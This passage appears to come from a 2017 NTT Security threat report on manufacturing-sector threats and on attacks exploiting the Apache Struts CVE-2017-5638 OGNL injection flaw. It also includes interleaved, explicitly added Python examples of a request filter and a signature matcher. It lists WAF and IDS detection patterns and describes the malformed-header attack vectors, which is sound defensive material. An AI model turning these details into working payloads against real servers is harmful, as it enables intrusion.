Perhaps the most influential of all trends results in one of the greatest emerging cyber threats to the manufacturing industry: smart factories. Hoping to add efficiency, productivity, quality of products and flexibility to the process, connected – or “smart” – factories are expected to add $500 billion to the global economy in the next five years, adding yet another avenue for threat actors to target the manufacturing industry.

This connectivity is expected to drive a 27 percent increase in efficiency during that timeframe, and by the end of 2022, manufacturers expect that 21 percent [11] of all factories will be fully connected. But all these additional tools, devices, and robots are redefining the attack surface in the manufacturing industry. Despite the benefits of connected devices, this creates an environment with a continually broadening attack landscape due to endpoint expansion. As these devices multiply, they can become crucial access points for an attacker to infiltrate a network, or become pawns in a botnet or even be victims of ransomware themselves. Simply put, the more systems you have, the more likely it is that an attacker is going to find something “interesting” in your environment. [12]

The rise of OT also plays a critical role in integrating manufacturing processes, improving productivity and efficiency, so long as these technologies are properly secured. Integration efforts vary widely by industry segment. For example, 67 percent of industrial manufacturing and 62 percent of aerospace and defense organizations have begun to implement smart factory initiatives, while only 37 percent of pharmaceutical manufacturers are leveraging digital technologies.

Industry 4.0: Automation, Connectivity and Servitization

Manufacturers are amid one of the most exciting technological changes in history, known as the fourth industrial revolution, or Industry 4.0. The capabilities – and challenges – represented by connectivity via IoT and OT, robotics and automation offer manufacturers the opportunity to operate more efficiently and effectively, developing new business processes, such as servitization (essentially, the evolution of an organization's capabilities to better create mutual value through a shift from selling product to selling Product-Service Systems), all taking customer service to a new level.

Although some U.S. manufacturers are moving more slowly in adopting Industry 4.0, 75 percent [13] of respondents in a 2017 report feel they have sufficient understanding of the issues and implications of Industry 4.0 and its threats and opportunities. In addition, a significant proportion of respondents were either beginning to move to Industry 4.0 (23%), or were planning to do so (62%). About 66 percent had made further investments in automation in the past 12 months, and most had acknowledged an understanding of servitization.

New Technologies and Reuse of Old Software

As in many industries, and as noted earlier, manufacturing has historically been geared toward meeting its business objectives rather than a quest for greater security. Another symptom of this mentality is that old software is reused (efficiency!), potentially propagating existing security holes.


11 http://enterpriseiotinsights.com/20170601/smart-factory/20170601smart-factorysmart-factories-economic-value-tag23
12 http://enterpriseiotinsights.com/20170601/smart-factory/20170601smart-factorysmart-factories-economic-value-tag23
13 http://www.nass.org.uk/Publications/Publication4261/Annual-Manufacturing-Report-2017.pdf



In addition, organizations are employing new technologies, potentially exposing firms to risks for which they may not yet have fully considered the impact on their security posture. For example, software may be built using open-source code already in existence on shared sites, possibly including some questionable sources, potentially putting an organization in danger if these hosts aren’t segmented from the rest of the network. While most of this shared code is safe, not all of it is. With hardcoded backdoors written into software, vulnerability proof-of-concepts in insecure software code, and more available online, the risk that an attacker will use this to his advantage increases.

As mentioned at the beginning of this section, new technologies are increasing the attack surface, and properly securing these technologies is essential to reducing the risk to your organization.

Cyber Espionage and Theft of IP

Twenty-one percent of manufacturers have suffered a loss of intellectual property from cyberattacks.

In its 2016 Manufacturing Report, Sikich [14] cited IP theft as the primary motive behind an attack on a manufacturing organization. To further drive the point home, the FBI estimates that IP worth $400 billion is stolen from U.S. firms alone, each year.

Cyber espionage is now considered to be the most common type of attack in this industry. A large part of this is due to the explosion of proprietary data and research.

These types of attacks can take many forms. Most commonly, though, attacks are attributed to competitors trying to obtain IP, whether that IP be proprietary manufacturing processes, patents or designs. Sadly, many international competitors are not highly ethical, viewing cyber espionage as another means to reach their own objectives.

Nation-state actors are heavily immersed in cyber espionage activities, with China dominating the cyber espionage space over the past two decades. Despite the cyber treaty signed in 2015 between the U.S. and China, the threat nevertheless continues, particularly in the manufacturing industry.

Cyber espionage is rampant and is not connected only to nation-state actors. In this global economy, goods can be produced virtually anywhere. If a competitor can steal the research and development behind those goods, then an unethical company, nation or cybercriminal will be able to undercut and win on price. It only costs the unsecured manufacturing firm, and its customers, money.

These attacks by “cyber-spies,” and any subsequent breaches, particularly those backed by nation-states, were behind a significant number of breaches experienced by manufacturing firms last year. These attacks are typically highly targeted and well thought out, targeting specific data. Over 90 percent of the material stolen had been categorized as “secret” or “proprietary,” indicating that the attackers successfully bypassed security controls currently in place, or simply that this is the type of data threat actors are seeking. That said, many state-backed threat actors have access to zero-days or other sophisticated tools. To combat these threats, manufacturers need to ensure they have, at the very least, best practices employed. Please note that these security shortfalls are not specific only to this industry, but seem to happen on a much broader, global scale.

Despite these emerging threats, the 2017 Cybersecurity Breaches Survey suggests that manufacturers are far less likely than many other sectors of the economy to rate cybersecurity as a serious priority for their organizations; it may be worth restating that just 31 percent of manufacturers regarded cybersecurity as a high priority. Hopefully this trend will reverse itself, as the industry faces huge changes in the coming years, requiring the utmost in network security if manufacturing organizations wish to remain competitive.

Recommendations

A paradigm shift in mindset is essential in all segments of the manufacturing industry and in all parts of the process. To successfully face current and future threats, cybersecurity must be built into all aspects of an organization’s networks and operations rather than retrofitted as an afterthought, particularly as Industry 4.0 is implemented. It should be clear that without the proper mitigation efforts in place, all processes are at risk, impacting the bottom line.


14 https://www.leadingedgealliance.com/thought_leadership/sikich_manufacturing_report_2016r.pdf



An organization greatly decreases the time it takes to bounce back from an attack if the paradigm shift has already occurred. Given the current state of cybersecurity in the manufacturing industry, where defenders are clearly at a disadvantage, attacks may be all but inevitable. With a renewed mindset, organizations in the manufacturing sector can become better equipped and more prepared to react to, and recover from, an attack. This is true for any organization, not just those in the manufacturing industry.

Threat actors and cybercriminals will continue to target victims in two areas: organizations with highly valuable data, and organizations with poor security practices. The manufacturing industry is one of those industries which has historically fallen into both categories. Like any organization, manufacturing organizations can take actions on network/program/software/platform levels to optimize security and reduce your risk of data compromise. If these recommendations can be successfully implemented, the environment can be made more secure in a practical, efficient manner.

NTT Security recommends manufacturing organizations consider the following preventative and mitigation strategies:

• Educate users on identifying and avoiding phishing emails – particularly since employees are the most often targeted, and may be the first – or only – line of defense.

• Ensure computers, network and other internet-connected devices, particularly industrial control systems, are running the most current versions of operating systems and software. Please note that the most current software versions are typically the most secure, but this is not always the case.

• In addition to outside actors, don’t forget to secure against the rogue insider – someone trusted within your organization, who perhaps has “the keys to the kingdom.”

• Enforce “least privilege” – vary the level of individual access, granted based on specific user needs and scenarios.

• To every practical extent, isolate sensitive systems and network functions. Group associated sensitive functions onto protected networks whenever possible, to include segmenting ICS from other network functions.

• Industrial networks are often not well segmented between IT/OT, so an infection in the former can easily spread to the latter.

• Let malware such as WannaCry serve as a recent lesson: although the manufacturing industry seemed almost immune to WannaCry, many Windows machines inside ICS environments are not fully patched, and are often running outdated, unsupported versions.

Threats to Manufacturing: Final Thoughts

The manufacturing industry will continue to mature through automation, servitization and Industry 4.0. NTT Security fully expects attacks in the manufacturing industry to continue. As the implementation of technology increases and attacking becomes more profitable, cybercriminals at all levels will continue to view the industry as incredibly lucrative, vulnerable, and attackable. Securing all facets of your organization is essential. Just one opening creates an opportunity for threat actors to gain, and maintain, a foothold in your network.

Expect IoT, OT and automated devices to continue playing an increasing role as manufacturing organizations consider how to harden their security infrastructure to support Industry 4.0 implementation efforts. Manufacturing organizations must maximize the effectiveness of security controls to protect these technologies as they are implemented.

As the number of endpoint devices increases, the attack surface will also increase, putting further strains on already burdened network infrastructure. This will leave many manufacturing firms striving to find ways to simplify and streamline cybersecurity controls.

Analysts anticipate seeing a blending of attack vectors, as the capability and motivation of threat actors increase and adapt to the ever-changing landscape.

This all means that somehow, manufacturing organizations need to force themselves to prioritize security as part of their evolution. Attackers have identified manufacturing firms as valuable targets, so it becomes incumbent on the industry to make themselves less attractive targets.

References:

http://www.eweek.com/security/deloitte-survey-finds-manufacturers-highly-vulnerable-to-cyber-threats

http://www.themanufacturer.com/reports-whitepapers/annual-manufacturing-report-2017/

http://www.nass.org.uk/Publications/Publication4261/Annual-Manufacturing-Report-2017.pdf


[Figure 18 (Struts attack vector flow) is a diagram; only its labels survive here. Components shown: StrutsPrepareAndExecuteFilter, MultiPartRequestWrapper, Commons FileUpload (parse, processUpload), buildErrorMessage, LocalizedTextUtil and ognl. Entry point: Jakarta Multipart Request. The basic flows for both filters, Jakarta and Jakarta Stream, are similar (orange arrows); blue arrows show the flow of S2-045 and the white arrow the flow of S2-046. The ognl step is reached if the error message includes an OGNL expression.]

Apache “Struts” its Stuff: A Quick Look into Apache Struts (CVE-2017-5638)

Introduction

Petya, WannaCry and the SMB vulnerabilities associated with MS17-010 dominated much of the news over the last half of Q2 ‘17, but were by no means the only threats organizations faced. NTT Security GTIC and NTT Computer Emergency Response Team (CERT) collaborated for a closer look at one of those threats, attacks seeking to exploit vulnerabilities in Apache Struts.

There was some buzz around Apache Struts (CVE-2017-5638) after Apache released its security advisories (S2-045 and S2-046) in March 2017. At the time of release, the vulnerabilities, which could allow remote code execution (RCE), were assigned a CVSS of 10, the most critical.

The bigger news about Struts is that attackers quickly jumped on the Struts bandwagon, and have remained there. Apache Struts exploit attempts quickly jumped into the top five attacks most commonly detected in client environments, and have remained in the top seven through June 2017.

Figure 18. Struts attack vector flow

So, no one should really be surprised that attackers are taking advantage of the Struts vulnerabilities – but how bad are they really?

What is a Struts Attack?

The RCE vulnerabilities are based on Struts’ use of Object Graph Navigation Language (OGNL) as a template language. Attackers exploit both S2-045 and S2-046 by crafting a malformed HTTP request, along with an OGNL payload, which forces Struts to create an exception. OGNL includes security restrictions on creating and accessing an object, so attacks must bypass those limitations.

Attack vectors for S2-045 and S2-046 are different, so errors occur in different phases of a process.

• S2-045: HTTP Content-Type header field

• S2-046: HTTP Content-Disposition header field and Content-Length field

The process flow related to each attack vector is shown in Figure 18.



Struts Attacks Timelines

NTT Security researchers and NTT-CERT both tracked the Struts announcement and attacks on a global scale. The timeline in Figure 19 summarizes activity over the first several days. Attackers tend to exploit public vulnerabilities quickly, taking advantage of exploits before security professionals can fully evaluate the vulnerabilities and before patches can be applied. The speed with which Apache Struts attacks (and others) were weaponized helps highlight the importance of effective vulnerability management. Organizations must be able to identify, classify, remediate, mitigate and track vulnerabilities in their environments to minimize the impact new vulnerabilities can have, and to react in an effective manner.

NTT Security and NTT Group resources began investigating Apache Struts within hours of the release of Apache’s security advisory. A researcher released proof-of-concept (PoC) code to exploit the vulnerability on March 8 and web application firewall (WAF) signatures were developed soon after. NTT Security detected what appeared to be malicious attack activity within 24 hours of the release of the PoC code. NTT Security and NTT-CERT analysts evaluated the effectiveness of the Apache patch, as well as WAF signatures in mitigating the impact of the observed attacks.

Figure 19. Struts timeline

[Figure 19 is a timeline chart spanning March 7 to March 11, 2017; its event labels are: Apache releases S2-045; Investigation at Apache; Apache releases patch; Investigation at NTT-CERT; Investigation at JPCERT; Investigation at NTT Security; PoC code released; Additional mitigation defined; WAF and Snort signature release; Applied WAF signatures and mitigation in NTT Group; Applied patch in NTT Group; Monitoring enabled by NTT Security; Attacks detected by NTT Security.]

In this process, the goal of NTT-CERT’s analysis was to provide current information for internal NTT Group resources, including NTT Security and supporting operating companies. The goal of NTT Security analysis was to provide current information for NTT Security operations and clients. Early on March 9, NTT Security was already detecting significant levels of exploit attempts. As shown in Figure 20, NTT Security detected consistent levels of attacks for several days before the sharp increase in attack traffic on March 17, which is almost completely attributable to activity from China-based sources.


[Figure 21 (Targeted industries in U.S. and Japan) is a bar chart comparing U.S. and Japan detections by industry on a 0% to 50% axis, across Education, Technology, Finance, Health Care, Government, Retail, Business Services, Entertainment, Energy and Media.]

[Figure 20 (Struts attack log counts) is a chart titled “CVE-2017-5638 Changes in Attack Volume”: daily attack counts (axis 500 to 2500) by day of date, March 9 through March 18, 2017, annotated with day-over-day changes of -27%, -46%, 14%, 42%, 44%, 11%, 11% and 102%.]


Figure 20. Struts attack log counts

While attacks originated from many countries around the world, 76 percent of all attacks targeting Apache Struts originated from IP addresses in China.

Observed Attacks

Sixty-nine percent of attacks from China attempted to disable local firewalls and install malware from remote servers using Linux retrieval commands such as wget. This often included attempts to pull down Linux 32-bit and 64-bit malware over POP port 110. Malware names ranged from UpTip60 through UpTip97. This malware was most often hosted in the United States, China or South Korea.

In some instances, wget was used but did not pull down any malicious binary. These were likely attempts to identify vulnerable servers, potentially to retrieve additional binaries for future attacks.

Struts Targets

Researchers specifically evaluated detections in Japan and U.S. operations. There was little overlap in the industries targeted in each region. In the U.S., 65 percent of all Struts detections were identified in the education and healthcare industries, while in Japan, 46 percent of all Struts attacks were reported in the government sector alone. Detections in each industry in the different geographies are shown in Figure 21. The fact that attackers continue to target different industries in different geographic regions should not surprise anyone. While the basics of an Apache Struts attack are similar across all geographies, the motivations of attackers change, as do the targets which attackers in each region find interesting.

Figure 21. Targeted industries in U.S. and Japan

Snort signatures (Figure 23):

Signature ID   Description
41818          SERVER-APACHE Apache Struts remote code execution attempt
41819          SERVER-APACHE Apache Struts remote code execution attempt
41923          SERVER-APACHE Apache Struts remote code execution attempt
2024038        ET WEB_SPECIFIC_APPS Possible Apache Struts OGNL Expression Injection (CVE-2017-5638)
2024044        ET WEB_SPECIFIC_APPS Possible Apache Struts OGNL Expression Injection (CVE-2017-5638) M2
2024045        ET WEB_SPECIFIC_APPS Possible Apache Struts OGNL Expression Injection (CVE-2017-5638) M3

F5 BIG-IP signature content (Figure 24):

headercontent:"_memberAccess"; nocase; re2:"/\b_memberAccess\b/Hi";
headercontent:"OgnlContext"; nocase;
valuecontent:"OgnlContext"; nocase;
headercontent:"MemberAccess"; nocase;
valuecontent:"MemberAccess"; nocase;

Imperva SecureSphere signatures (Figure 25):

Signature pattern: part="_memberAccess", rgxp="\b_memberAccess\b"; Protocol(s): http, https; Field(s) for search: header
Signature pattern: part="OgnlContext"; Protocol(s): http, https; Field(s) for search: header
Signature pattern: part="OgnlContext"; Protocol(s): http, https; Field(s) for search: parameter
Signature pattern: part="MemberAccess"; Protocol(s): http, https; Field(s) for search: header, parameter

Why Target Struts?

Globally, Struts seems an unlikely target. Apache Struts has relatively low global market adoption when compared to other common web frameworks. Figure 22 [15] shows the relative market share of several web frameworks. However, market share changes when regional impact is considered. A 2013 survey completed in Japan [16] showed that Struts had a 17 percent market share in Japan, which may have helped contribute to elevated levels of attacks in some markets.

NTT Security anticipates cybercriminals will continue targeting Apache Struts installations because of the wide installation base, the simplicity of the attack, and the fact that the attack includes the ability to execute code remotely.


[Figure 22 (Market share of common web frameworks) is a bar chart of “% of Respondents” (0 to 50) per web framework: Spring MVC, Spring Boot, JSF, “We don't”, Vaadin, Other, GWT, Play 2, Grails, Struts 2, Struts 1, Wicket, Dropwizard, Play 1. The percentages printed on the chart, in extraction order and not matched to individual bars, are 43%, 29%, 17%, 29%, 1%, 5%, 19%, 19%, 17%, 6%, 13%, 13%, 4%, 4%, 3%, 3%, 3%.]

Figure 23. Snort Signatures.

Figure 25. Imperva SecureSphere.

Figure 24. F5 BIG IP.

Figure 22. Market share of common web frameworks

15 https://zeroturnaround.com/rebellabs/java-tools-and-technologies-landscape-2016/
16 http://www.sbbit.jp/article/cont1/26911 (Please note that this article is only available in Japanese.)


Apache Struts Mitigation

Criminals continue to target Apache Struts installations. To help mitigate these attacks, organizations should consider the following actions:

• Upgrade to Struts versions 2.3.32 or Struts 2.5.10.1 (or later).

• Implement a servlet filter which will validate Content-Type and throw away requests with suspicious values not matching multipart/form-data.

• Change to a different multipart parser such as pell or the parser from the Commons-FileUpload Library [17].
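The second action, a filter that discards requests whose Content-Type does not parse as a legitimate media type, is small enough to show in full. The following is an added example, not code from the report, from NTT or from the Struts project; it is written in Python rather than as a Java servlet filter so the check can be run against sample requests, and it extends the same idea to the S2-046 fields named earlier (Content-Length and each part's Content-Disposition). The grammar is the HTTP token/quoted-string syntax; the expression-marker list and the sample requests are assumptions constructed for the example.

```python
import re

# RFC 7230 "token" characters. Braces and whitespace are not token characters,
# so a header whose value is an expression of the form %{...} fails the grammar.
TCHAR = r"[!#$%&'*+\-.^_`|~0-9A-Za-z]"
TOKEN = TCHAR + "+"
QUOTED = r'"(?:[^"\\]|\\.)*"'
PARAM = rf"\s*;\s*{TOKEN}\s*=\s*(?:{TOKEN}|{QUOTED})"
MEDIA_TYPE_RE = re.compile(rf"^\s*{TOKEN}/{TOKEN}(?:{PARAM})*\s*$")   # Content-Type
DISPOSITION_RE = re.compile(rf"^\s*{TOKEN}(?:{PARAM})*\s*$")          # Content-Disposition
CONTENT_LENGTH_RE = re.compile(r"^\d+$")
# Expression markers that could hide inside a quoted parameter value (assumed list).
OGNL_MARKERS = ("%{", "${")


def header_is_suspicious(value, grammar):
    """True when the header value breaks its grammar or carries an expression marker."""
    if grammar.match(value) is None:
        return True
    return any(marker in value for marker in OGNL_MARKERS)


def check_request(headers, body=b""):
    """Emulate the servlet-filter workaround: reject a request whose Content-Type,
    Content-Length or part Content-Disposition is malformed. Returns (accepted, reason)."""
    h = {k.lower(): v for k, v in headers.items()}
    ctype = h.get("content-type", "")
    if ctype and header_is_suspicious(ctype, MEDIA_TYPE_RE):
        return False, "malformed Content-Type"
    if ctype.lower().startswith("multipart/form-data"):
        if not CONTENT_LENGTH_RE.match(h.get("content-length", "")):
            return False, "malformed Content-Length"
        # Check every part header line of the form "Content-Disposition: ...".
        for m in re.finditer(rb"(?im)^content-disposition:[ \t]*(.*?)\r?$", body):
            if header_is_suspicious(m.group(1).decode("latin-1"), DISPOSITION_RE):
                return False, "malformed Content-Disposition"
    return True, "ok"


# Constructed sample requests (not captured traffic). "%{placeholder}" stands in
# for an expression in the rejected samples; it is not a working payload.
BENIGN_UPLOAD = (
    {"Content-Type": "multipart/form-data; boundary=----abc", "Content-Length": "146"},
    b"------abc\r\n"
    b'Content-Disposition: form-data; name="file"; filename="report.pdf"\r\n'
    b"Content-Type: application/pdf\r\n\r\n%PDF-1.4\r\n------abc--\r\n",
)
BAD_CONTENT_TYPE = ({"Content-Type": "%{placeholder}"}, b"")
BAD_CONTENT_LENGTH = (
    {"Content-Type": "multipart/form-data; boundary=----abc", "Content-Length": "x"},
    b"",
)
BAD_DISPOSITION = (
    {"Content-Type": "multipart/form-data; boundary=----abc", "Content-Length": "99"},
    b'------abc\r\nContent-Disposition: form-data; name="file"; filename="%{placeholder}"\r\n\r\n',
)

if __name__ == "__main__":
    samples = {"benign upload": BENIGN_UPLOAD, "bad Content-Type": BAD_CONTENT_TYPE,
               "bad Content-Length": BAD_CONTENT_LENGTH, "bad Content-Disposition": BAD_DISPOSITION}
    for label, (hdrs, body) in samples.items():
        print(label, "->", check_request(hdrs, body))
```

The allow-list grammar does most of the work: a media type is two tokens separated by a slash plus parameters, and an OGNL expression cannot be spelled with token characters alone. The marker check only covers the one place the grammar permits arbitrary text, a quoted parameter value. A filter like this is a stopgap; the upgrade in the first bullet is the actual fix, and the filter stays useful afterwards only as a cheap way to log attempts.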

Struts Signatures and Rules

NTT Group has identified the following signatures and rules which may help mitigate attacks. While other detections may be available, NTT Group has identified these signatures and rules as particularly reliable.
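To make the vendor rules concrete, here is an added example (not the vendors' rule engines and not NTT's code) that transcribes the F5 BIG-IP and Imperva SecureSphere patterns from Figures 24 and 25 into regular expressions and runs them over the header values and parameter values of raw HTTP requests, honouring the nocase flag, the \b word boundaries and the header-versus-parameter search fields each row specifies. The Snort rule bodies (SIDs 41818, 41819, 41923, 2024038, 2024044 and 2024045) are not reproduced on the page, so they are not implemented. The sample requests are constructed and contain only the bare token names the rules look for.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Patterns transcribed from the F5 / Imperva rows (Figures 24 and 25).
# "nocase" becomes re.IGNORECASE; "header" means any request header value,
# "parameter" any query-string or form-encoded field value.
SIGNATURES = [
    ("_memberAccess in header", re.compile(r"\b_memberAccess\b", re.I), ("header",)),
    ("OgnlContext in header", re.compile(r"OgnlContext", re.I), ("header",)),
    ("OgnlContext in parameter", re.compile(r"OgnlContext", re.I), ("parameter",)),
    ("MemberAccess in header or parameter", re.compile(r"MemberAccess", re.I),
     ("header", "parameter")),
]


def parse_request(raw):
    """Split a raw HTTP/1.1 request into {header: value} and {param: value}."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    _method, target, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    # parse_qsl percent-decodes, so encoded parameter values are inspected decoded.
    params = dict(parse_qsl(urlsplit(target).query, keep_blank_values=True))
    if headers.get("content-type", "").startswith("application/x-www-form-urlencoded"):
        params.update(parse_qsl(body, keep_blank_values=True))
    return headers, params


def match_signatures(raw):
    """Return the names of every signature that fires on the request."""
    headers, params = parse_request(raw)
    fields = {"header": list(headers.values()), "parameter": list(params.values())}
    return [name for name, regex, where in SIGNATURES
            if any(regex.search(v) for f in where for v in fields[f])]


# Constructed sample requests (not captured traffic). The flagged ones carry
# only the token names the rules match on, not a working payload.
BENIGN = ("POST /upload.action HTTP/1.1\r\nHost: app.example\r\n"
          "Content-Type: multipart/form-data; boundary=----abc\r\n\r\n------abc--\r\n")
HEADER_TOKENS = ("POST /upload.action HTTP/1.1\r\nHost: app.example\r\n"
                 "Content-Type: %{placeholder _memberAccess OgnlContext}\r\n\r\n")
PARAM_TOKEN = "GET /index.action?q=OgnlContext&page=1 HTTP/1.1\r\nHost: app.example\r\n\r\n"
FORM_TOKEN = ("POST /index.action HTTP/1.1\r\nHost: app.example\r\n"
              "Content-Type: application/x-www-form-urlencoded\r\n\r\nname=MemberAccess")

if __name__ == "__main__":
    for label, raw in [("benign", BENIGN), ("header tokens", HEADER_TOKENS),
                       ("query token", PARAM_TOKEN), ("form token", FORM_TOKEN)]:
        print(label, "->", match_signatures(raw))
```

Two details are worth noticing. The MemberAccess pattern is case-insensitive and has no word boundaries, so it also fires on `_memberAccess`, which is why a header hit from the first row is always accompanied by a hit from the last; rule tuning that counts alerts should expect that overlap. And because the parameter rules only see decoded values, a detector that skips percent-decoding (or ignores form bodies) would miss the query and form samples entirely.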

Apache Struts: Summary

Attacks against Apache Struts have not reached the same level of attention as WannaCry, Petya, or many other attacks, but attackers have made consistent attempts to exploit the vulnerabilities in Apache Struts since the PoC code was released. Apache Struts has probably not received the level of attention it deserved, given that it has been a “top 7” attack consistently since its release.

As is true with many current vulnerabilities, the single most effective mitigating control is to patch systems in your environment, in this case, Apache Struts. That said, don’t expect Apache Struts attacks to disappear until a lot more organizations have completed that patching.


17 http://commons.apache.org/proper/commons-fileupload/


Summary

With a 24 percent increase in overall activity, Q2’17 was characterized by a wider blend of attack methods compared to Q4’16. Attacks observed in Q2’17 included a variety of web application attacks, attacks allowing for remote code execution, and phishing-based attacks. Within these phishing campaigns, however, cybercriminals appeared to have a narrower focus, as their preferred vector was leveraging PowerShell commands in VBA macros within malicious attachments.

NTT researchers also noted an uptick in reconnaissance – possibly indicating attack preparation during the upcoming 3rd and 4th quarters. This is a trend NTT Security researchers have observed in previous years, including during Q3 and Q4’16, when recon activity declined. There is a strong likelihood that this trend will continue during the last two quarters of 2017 as well, as attackers again shift to more targeted attacks as they determine their targets’ vulnerabilities.

This may not bode well for the manufacturing industry, as a large part of overall reconnaissance activity was aimed at the manufacturing industry during Q2’17, and 33 percent of overall activity against the manufacturing industry was reconnaissance-based. If trends from the past few years continue, this probably indicates that attacks and malware are likely to increase in manufacturing organizations in the second half of 2017.

Even without the looming threat of increased attack volumes, the manufacturing industry faces a variety of security challenges in its ongoing evolution. With more technology and connectivity continually being introduced into the industry, manufacturing is quickly becoming a high-value target for cybercriminals. While not typically thought of as highly 'attackable,' manufacturing has been one of the most consistently attacked industries over the past several years, and was the most targeted industry in Q2 ‘17. In addition to potential threats unique to manufacturers, the industry also faces a variety of threats prevalent across many industries, including insider and technical threats.

The tactics of cybercriminals will continue to evolve, as does the technology available to them. That being said, many threat actors continue to use tried and true methods (e.g., unpatched vulnerabilities), with many organizations failing to properly secure these attack vectors – a lesson many organizations learn the hard way.

About GTIC

The NTT Security GTIC protects and informs NTT Security clients through security threat research, vulnerability analysis and the development of effective countermeasures. For more information, including vulnerability disclosures [18] and threat reports [19], visit the research page on www.nttsecurity.com, our blog [20] or download related white papers [21].

About NTT-CERT

NTT-CERT, a division of NTT Secure Platform Laboratories, serves as a trusted point of contact for Computer Security Incident Response Team (CSIRT) specialists, and provides full-range CSIRT services within NTT. NTT-CERT generates original intelligence regarding cybersecurity threats, helping to enhance NTT companies' capabilities in the security services and secure network services fields. To learn more about NTT-CERT, please visit www.ntt-cert.org [22].

About NTT Security

NTT Security is the specialized security company of NTT Group. With embedded security, we enable Group companies (Dimension Data, NTT Communications and NTT DATA) to deliver resilient business solutions for clients’ digital transformation needs. NTT Security has 10 SOCs, seven R&D centers, over 1,500 security experts and handles hundreds of thousands of security incidents annually across six continents.

NTT Security ensures that resources are used effectively by delivering the right mix of consulting and managed services for NTT Group companies – making best use of local resources and leveraging our global capabilities. NTT Security is part of the NTT Group (Nippon Telegraph and Telephone Corporation), one of the largest ICT companies in the world. Visit nttsecurity.com to learn more.

18 https://www.solutionary.com/threat-intelligence/vulnerability-disclosures/
19 https://www.solutionary.com/threat-intelligence/threat-reports/
20 http://www.solutionary.com/resource-center/blog/
21 http://www.solutionary.com/resource-center/white-papers/
22 http://www.ntt-cert.org